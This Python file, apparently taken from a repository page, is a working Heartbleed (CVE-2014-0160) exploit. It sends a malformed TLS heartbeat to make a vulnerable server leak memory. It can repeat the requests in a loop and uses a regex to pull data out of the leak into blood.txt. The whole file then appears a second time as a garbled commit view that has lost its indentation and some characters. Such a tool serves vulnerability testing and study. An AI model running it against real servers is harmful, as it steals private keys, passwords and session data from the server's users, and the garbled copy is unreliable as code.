misc/python/hb.py

#!/usr/bin/env python3

## Flavored heartbleed test

import socket
import struct
import select
import time
import re
import argparse


def hex2bin(x):
    return bytes.fromhex(re.sub('\s', '', x))


def format(s):
    for i in zip(*[iter(s)] * 64):
        if any(i):
            for k in i:
                if k in range(26, 128):
                    yield chr(k)
                else:
                    yield '.'
            yield '\n'


def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = b''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata


def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print('[Error] Unexpected EOF in header - server closed connection')
        return (None,) * 3
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print('[Error] Unexpected EOF in payload - server closed connection')
        return (None,) * 3
    print('[Received message]', 'type:', typ, 'ver:', ver, 'length:', len(pay))
    return typ, ver, pay


def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print('[Not vulnerable] No heartbeat response received.')

        if typ == 24:
            print('Received heartbeat response:')
            if len(pay) > 3:
                print('[Vulnerable] Server is vulnerable.')
                return format(pay)
            else:
                print('[Not vulnerable] Server did not return any extra data.')

        if typ == 21:
            print('[Not vulnerable] Server returned error.')
            return format(pay)


def main():
    parser = argparse.ArgumentParser(
        description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
    parser.add_argument('hostname', help='Hostname, ip address.')
    parser.add_argument(
        '-p', '--port',
        type=int, default=443,
        help='TCP port to test (default: 443)')
    parser.add_argument(
        '-s', '--starttls',
        action='store_true', default=False,
        help='check STARTTLS')
    parser.add_argument(
        '-l', '--loop',
        action='store_true', default=False,
        help='keep sending heartbeats')
    parser.add_argument(
        '-r', '--regex',
        type=str, default='',
        help='results to extract')
    args = parser.parse_args()
    while True:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            print('Connecting to %s...' % args.hostname)
            s.connect((args.hostname, args.port))

            if args.starttls:
                rec = s.recv(4096)
                s.send(b'ehlo starttlstest\n')
                rec = s.recv(1024)
                if b'STARTTLS' not in rec:
                    print('[Error] STARTTLS not supported.')
                    return
                s.send(b'starttls\n')
                rec = s.recv(1024)

            print('Sending Client Hello...')
            s.send(hello)
            print('Waiting for Server Hello...')

            while True:
                typ, ver, pay = recvmsg(s)
                if typ is None:
                    print('[Error] Server closed connection.')
                    return
                # Look for server hello done message.
                if typ == 22 and pay[0] == 0x0E:
                    break

            print('Sending heartbeat request...')
            s.send(hb)
            data = ''.join(hit_hb(s))

            if data:
                print('Received data:', data, sep="\n")

                if args.regex:
                    matches = re.compile(args.regex, re.DOTALL).findall(data)
                    with open('blood.txt', 'a') as file:
                        file.write('\n'.join(matches))

            if not args.loop:
                s.close()
                break
        except KeyboardInterrupt:
            s.close()
            return

hello = hex2bin('''
    16 03 02 00  dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
    00 0f 00 01 01''')

hb = hex2bin('''
    18 03 02 00 03
    01 40 00''')

if __name__ == '__main__':
    main()
initial commit 2018-08-05 18:53:07 +02:00			`#!/usr/bin/env python3`

			`## Flavored heartbleed test`

			`import socket`
			`import struct`
			`import select`
			`import time`
			`import re`
			`import argparse`


			`def hex2bin(x):`
			`return bytes.fromhex(re.sub('\s', '', x))`


			`def format(s):`
			`for i in zip([iter(s)] 64):`
			`if any(i):`
			`for k in i:`
			`if k in range(26, 128):`
			`yield chr(k)`
			`else:`
			`yield '.'`
			`yield '\n'`


			`def recvall(s, length, timeout=5):`
			`endtime = time.time() + timeout`
			`rdata = b''`
			`remain = length`
			`while remain > 0:`
			`rtime = endtime - time.time()`
			`if rtime < 0:`
			`return None`
			`r, w, e = select.select([s], [], [], 5)`
			`if s in r:`
			`data = s.recv(remain)`
			`# EOF?`
			`if not data:`
			`return None`
			`rdata += data`
			`remain -= len(data)`
			`return rdata`


			`def recvmsg(s):`
			`hdr = recvall(s, 5)`
			`if hdr is None:`
			`print('[Error] Unexpected EOF in header - server closed connection')`
			`return (None,) * 3`
			`typ, ver, ln = struct.unpack('>BHH', hdr)`
			`pay = recvall(s, ln, 10)`
			`if pay is None:`
			`print('[Error] Unexpected EOF in payload - server closed connection')`
			`return (None,) * 3`
			`print('[Received message]', 'type:', typ, 'ver:', ver, 'length:', len(pay))`
			`return typ, ver, pay`


			`def hit_hb(s):`
			`s.send(hb)`
			`while True:`
			`typ, ver, pay = recvmsg(s)`
			`if typ is None:`
			`print('[Not vulnerable] No heartbeat response received.')`

			`if typ == 24:`
			`print('Received heartbeat response:')`
			`if len(pay) > 3:`
			`print('[Vulnerable] Server is vulnerable.')`
			`return format(pay)`
			`else:`
			`print('[Not vulnerable] Server did not return any extra data.')`

			`if typ == 21:`
			`print('[Not vulnerable] Server returned error.')`
			`return format(pay)`


			`def main():`
			`parser = argparse.ArgumentParser(`
			`description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')`
			`parser.add_argument('hostname', help='Hostname, ip address.')`
			`parser.add_argument(`
			`'-p', '--port',`
			`type=int, default=443,`
			`help='TCP port to test (default: 443)')`
			`parser.add_argument(`
			`'-s', '--starttls',`
			`action='store_true', default=False,`
			`help='check STARTTLS')`
			`parser.add_argument(`
			`'-l', '--loop',`
			`action='store_true', default=False,`
			`help='keep sending heartbeats')`
			`parser.add_argument(`
			`'-r', '--regex',`
			`type=str, default='',`
			`help='results to extract')`
			`args = parser.parse_args()`
			`while True:`
			`try:`
			`s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)`
			`print('Connecting to %s...' % args.hostname)`
			`s.connect((args.hostname, args.port))`

			`if args.starttls:`
			`rec = s.recv(4096)`
			`s.send(b'ehlo starttlstest\n')`
			`rec = s.recv(1024)`
			`if b'STARTTLS' not in rec:`
			`print('[Error] STARTTLS not supported.')`
			`return`
			`s.send(b'starttls\n')`
			`rec = s.recv(1024)`

			`print('Sending Client Hello...')`
			`s.send(hello)`
			`print('Waiting for Server Hello...')`

			`while True:`
			`typ, ver, pay = recvmsg(s)`
			`if typ is None:`
			`print('[Error] Server closed connection.')`
			`return`
			`# Look for server hello done message.`
			`if typ == 22 and pay[0] == 0x0E:`
			`break`

			`print('Sending heartbeat request...')`
			`s.send(hb)`
			`data = ''.join(hit_hb(s))`

			`if data:`
			`print('Received data:', data, sep="\n")`

			`if args.regex:`
			`matches = re.compile(args.regex, re.DOTALL).findall(data)`
			`with open('blood.txt', 'a') as file:`
			`file.write('\n'.join(matches))`

			`if not args.loop:`
			`s.close()`
			`break`
			`except KeyboardInterrupt:`
			`s.close()`
			`return`

			`hello = hex2bin('''`
			`16 03 02 00 dc 01 00 00 d8 03 02 53`
			`43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf`
			`bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00`
			`00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88`
			`00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c`
			`c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09`
			`c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44`
			`c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c`
			`c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11`
			`00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04`
			`03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19`
			`00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08`
			`00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13`
			`00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00`
			`00 0f 00 01 01''')`

			`hb = hex2bin('''`
			`18 03 02 00 03`
			`01 40 00''')`

			`if __name__ == '__main__':`
			`main()`